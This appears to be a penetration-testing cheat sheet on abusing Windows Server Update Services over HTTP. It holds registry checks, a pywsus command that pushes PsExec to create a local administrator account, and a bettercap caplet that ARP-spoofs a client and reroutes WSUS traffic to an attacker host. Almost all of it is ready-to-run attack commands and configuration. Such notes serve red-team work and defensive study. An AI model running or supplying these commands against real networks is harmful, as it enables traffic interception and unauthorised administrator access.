WSUS
Windows Server Update Services

HTTP MitM

Check:
PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
WUServer REG_SZ http://wsus.megacorp.local:8530
PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
UseWUServer REG_DWORD 0x1
Exploit:
$ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser /add && net localgroup Administrators testuser /add"'
$ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap
wsus.cap
# Quick recon of the network
net.probe on
# Set the ARP spoofing
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false
# Re-route traffic aimed at the WSUS server
set any.proxy.iface $INTERFACE
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_SERVER_IP
set any.proxy.src_port 8530
set any.proxy.dst_address $ATTACKER_IP
set any.proxy.dst_port 8530
# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff
# Start the modules
any.proxy on
arp.spoof on
net.sniff on

Local Proxy (LPE)

WSUS + LDAPS NTLM Relay

Tools

SharpWSUS

Last modified 1mo ago